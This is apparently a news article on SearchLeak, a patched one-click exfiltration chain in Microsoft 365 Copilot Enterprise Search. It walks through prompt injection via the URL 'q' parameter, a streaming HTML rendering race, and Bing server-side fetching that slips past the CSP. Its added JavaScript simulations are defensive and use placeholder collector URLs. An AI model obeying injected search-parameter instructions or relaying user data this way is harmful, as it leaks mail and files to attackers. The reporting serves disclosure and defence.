# Researchers Reveal One-Click Microsoft 365 Copilot Data-Exfiltration Flaw

> Source: <https://letsdatascience.com/news/researchers-reveal-one-click-microsoft-365-copilot-data-exfi-40bf7961>
> Published: 2026-06-15 17:09:48.930980+00:00


Varonis Threat Labs disclosed SearchLeak (CVE-2026-42824, critical), a one-click data-exfiltration chain in Microsoft 365 Copilot Enterprise Search. The attack chains three flaws: a parameter-to-prompt (P2P) injection via the URL 'q' parameter that feeds Copilot attacker instructions; an HTML rendering race condition that fires an attacker-controlled image tag before output sanitization completes; and a Bing server-side request forgery (SSRF) that routes stolen data through Bing's image retrieval endpoint, bypassing the page's Content Security Policy entirely because the outbound request originates from Microsoft infrastructure rather than the victim's browser (Varonis; BleepingComputer). The victim sees only Copilot "thinking" - no visible data movement occurs. Exfiltration targets include mailbox content, calendar events, and OneDrive and SharePoint files. Because the crafted link uses a real microsoft.com domain, standard URL filtering and anti-phishing tools are unlikely to flag it (The Hacker News). Microsoft patched the flaw server-side at the beginning of June 2026, requiring no customer action; Varonis disclosed a proof-of-concept only, with no observed in-the-wild exploitation (BleepingComputer; MSRC).

### What happened

Varonis Threat Labs disclosed SearchLeak on June 15, 2026 - a one-click data-exfiltration chain targeting Microsoft 365 Copilot Enterprise Search. Microsoft assigned the vulnerability CVE-2026-42824 with a critical severity rating; CVSS scores were 6.5 per Microsoft's advisory and 7.5 per the National Vulnerability Database (The Hacker News; MSRC). The company patched the flaw on its backend at the beginning of June 2026, requiring no action from customers, and Varonis disclosed only a proof-of-concept with no evidence of in-the-wild exploitation (BleepingComputer; Varonis SearchLeak).

### Three-stage attack chain

SearchLeak combines three individually insufficient weaknesses to achieve one-click exfiltration (Varonis SearchLeak; BleepingComputer).

Stage 1 - Parameter-to-Prompt (P2P) injection: Microsoft 365 Copilot Enterprise Search accepts a 'q' URL parameter for natural-language search queries. Unlike standard Copilot, Copilot Enterprise Search retrieves company data from email, calendar, SharePoint, and OneDrive. An attacker crafts a URL with instructions in 'q' telling Copilot to search the victim's mailbox and embed results in an image URL. The victim types nothing; one click hands off the work to Copilot (Varonis SearchLeak).

Stage 2 - HTML rendering race: Microsoft's safeguard wraps Copilot output in code blocks so browsers treat markup as plain text. The catch is timing: the wrapping happens after generation completes, but browsers render the streamed output as it arrives. The injected image tag fires and makes its outbound request before sanitization runs (BleepingComputer).
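To make the timing problem concrete, the following is an added simulation of a streaming renderer. It is not Varonis's proof-of-concept and not Microsoft's rendering code; the chunk boundaries, the `example.invalid` collector URL and the function names are constructed for illustration. The first renderer reproduces the weak pattern described above (append raw chunks, wrap in a code block only when the stream ends); the second escapes each chunk before it is appended, so no intermediate state ever contains live markup even when a tag is split across chunks.

```javascript
// Added example (not Varonis's PoC, not Microsoft's code): compares two ways of
// rendering a streamed model answer and records every intermediate DOM state.

// Minimal HTML escaper; works per character, so splitting a tag across chunks
// does not help an injected payload.
const escapeHtml = (s) =>
  s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));

// Constructed sample stream: the answer arrives in three chunks, with an <img>
// tag straddling the chunk boundaries, as a token-streaming API might deliver it.
const SAMPLE_CHUNKS = [
  'Here is what I found: <im',
  'g src="https://example.invalid/collect?d=SAMPLE"',
  '> end of answer',
];

// Weak pattern: raw chunks are appended as they arrive and the code-block
// wrapper (with escaping) is applied only after the stream completes.
// Returns every intermediate state so the live-markup window is observable.
function renderWrapAfterComplete(chunks) {
  const states = [];
  let html = '';
  for (const chunk of chunks) {
    html += chunk;          // unescaped markup reaches the renderer mid-stream
    states.push(html);
  }
  // Sanitization happens here, after the browser has already parsed the tag.
  states.push('<pre><code>' + escapeHtml(html) + '</code></pre>');
  return states;
}

// Hardened pattern: escape before append, so every intermediate state is inert
// regardless of where the chunk boundaries fall.
function renderEscapePerChunk(chunks) {
  const states = [];
  let html = '<pre><code>';
  for (const chunk of chunks) {
    html += escapeHtml(chunk);
    states.push(html);
  }
  states.push(html + '</code></pre>');
  return states;
}

// Check used by the comparison: did any intermediate state contain a live <img> tag?
function anyStateHasLiveImg(states) {
  return states.some((s) => /<img\b/i.test(s));
}

// Stand-alone run: the weak renderer exposes a live tag in its second state,
// the hardened renderer never does.
console.log('wrap-after-complete leaks:', anyStateHasLiveImg(renderWrapAfterComplete(SAMPLE_CHUNKS)));
console.log('escape-per-chunk leaks:  ', anyStateHasLiveImg(renderEscapePerChunk(SAMPLE_CHUNKS)));
```

The design point is that the safeguard has to sit on the path every chunk takes to the DOM, not at the end of the stream; a wrapper applied once at completion protects only the final state, and the browser has already acted on the earlier ones.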

Stage 3 - Bing SSRF as exfiltration proxy: The page's Content Security Policy blocks image requests to arbitrary domains but allowlists *.bing.com. Bing's 'Search by Image' endpoint accepts a URL and fetches it server-side. The attacker points that fetch at their own server with the stolen data encoded in the path. The browser's request goes only to Bing, an allowlisted host; the onward request to the attacker's domain is made by Bing, so the CSP never evaluates it. The stolen data is then readable in the attacker's server logs (Varonis SearchLeak; BleepingComputer).
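The following added example shows which hop a Content Security Policy actually decides on, using a minimal `img-src` matcher. It is not Microsoft's policy engine and not a complete CSP implementation: only `'self'` and host expressions with an optional leading `*.` are handled, and the policy string, page origin, collector hostname and the Bing path (a placeholder, not a real endpoint) are all constructed for illustration. The audit helper at the end flags wildcard entries, which is the review a defender would want to run on a policy like this one.

```javascript
// Added example (not Microsoft's code, not a full CSP parser): a small img-src
// matcher illustrating that CSP evaluates the browser's first hop only.

// Extract the source expressions of the img-src directive from a CSP header.
function parseImgSrc(cspHeader) {
  const directive = cspHeader
    .split(';')
    .map((d) => d.trim())
    .find((d) => /^img-src(\s|$)/.test(d));
  if (!directive) return [];
  return directive.replace(/^img-src/, '').trim().split(/\s+/).filter(Boolean);
}

// Host-expression match: "*.bing.com" matches subdomains of bing.com but,
// as in the CSP specification, not the bare apex "bing.com".
function hostMatches(pattern, host) {
  const p = pattern.replace(/^https?:\/\//, '').toLowerCase();
  if (p.startsWith('*.')) {
    const suffix = p.slice(1);              // "*.bing.com" -> ".bing.com"
    return host.endsWith(suffix) && host.length > suffix.length;
  }
  return p === host;
}

// True if the policy lets the browser issue this image request at all.
function cspAllowsImage(cspHeader, pageOrigin, imageUrl) {
  const target = new URL(imageUrl);
  const page = new URL(pageOrigin);
  return parseImgSrc(cspHeader).some((src) =>
    src === "'self'"
      ? target.origin === page.origin
      : hostMatches(src, target.hostname.toLowerCase()));
}

// Audit helper: wildcard img-src entries deserve review, because any host under
// that suffix which fetches caller-supplied URLs on the server side effectively
// extends the allowlist to wherever it is willing to fetch from.
function wildcardImgSources(cspHeader) {
  return parseImgSrc(cspHeader).filter((src) => src.includes('*'));
}

// Constructed policy and URLs (placeholders, not real endpoints or origins).
const SAMPLE_CSP = "default-src 'self'; img-src 'self' *.bing.com";
const SAMPLE_PAGE = 'https://copilot-page.example.test';
const DIRECT_URL = 'https://collector.invalid/SAMPLE';
const PROXIED_URL =
  'https://www.bing.com/PLACEHOLDER-FETCH-ENDPOINT?url=' +
  encodeURIComponent(DIRECT_URL);

// Stand-alone run: the direct request is blocked, the same destination reached
// through an allowlisted server-side fetcher is not.
console.log('direct  allowed:', cspAllowsImage(SAMPLE_CSP, SAMPLE_PAGE, DIRECT_URL));
console.log('proxied allowed:', cspAllowsImage(SAMPLE_CSP, SAMPLE_PAGE, PROXIED_URL));
console.log('wildcard entries to review:', wildcardImgSources(SAMPLE_CSP));
```

The takeaway for policy review is that an `img-src` allowlist constrains only the host the browser talks to; if an allowlisted host will fetch arbitrary URLs on the caller's behalf, the policy's effective scope is that host's fetch scope, not the listed name.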

### Scope and data at risk

The affected product is Microsoft 365 Copilot Enterprise Search. Potentially exfiltrated content includes email text (including access codes and passwords), calendar events and meeting details, and files accessible through OneDrive and SharePoint (BleepingComputer). The crafted link uses a real microsoft.com domain, so anti-phishing and URL reputation tools are unlikely to flag it as suspicious (The Hacker News).

### Remediation and status

Microsoft mitigated SearchLeak server-side at the beginning of June 2026. No client-side patch or user action is required. Varonis published a proof-of-concept and reported no evidence of exploitation in the wild at time of disclosure (BleepingComputer; MSRC).

### Industry context

Editorial analysis: Varonis has identified a recurring class of Copilot vulnerabilities including Reprompt (January 2026, Copilot Personal) and EchoLeak (2025, M365 Copilot). SearchLeak adds a new variant specific to the Enterprise Search surface. The pattern illustrates how AI-assisted search features - which combine LLM instruction-following, streaming render pipelines, and server-side fetch integrations - create compound attack surfaces where individually known bug classes (SSRF, HTML injection timing) become high-impact when chained with prompt injection. "Bing becomes an unwitting exfiltration proxy. A classic SSRF, hiding in plain sight behind a CSP allowlist entry," Varonis researchers wrote (Varonis SearchLeak).

## Scoring Rationale

SearchLeak is a critical-rated, well-documented vulnerability chain in widely deployed enterprise AI (M365 Copilot Enterprise Search), with full technical disclosure from Varonis and coverage across multiple security outlets. Impact is tempered by server-side patching before public disclosure and absence of observed exploitation, and actual CVSS scores (6.5/7.5) are lower than initially reported; this places it at the upper end of Notable.

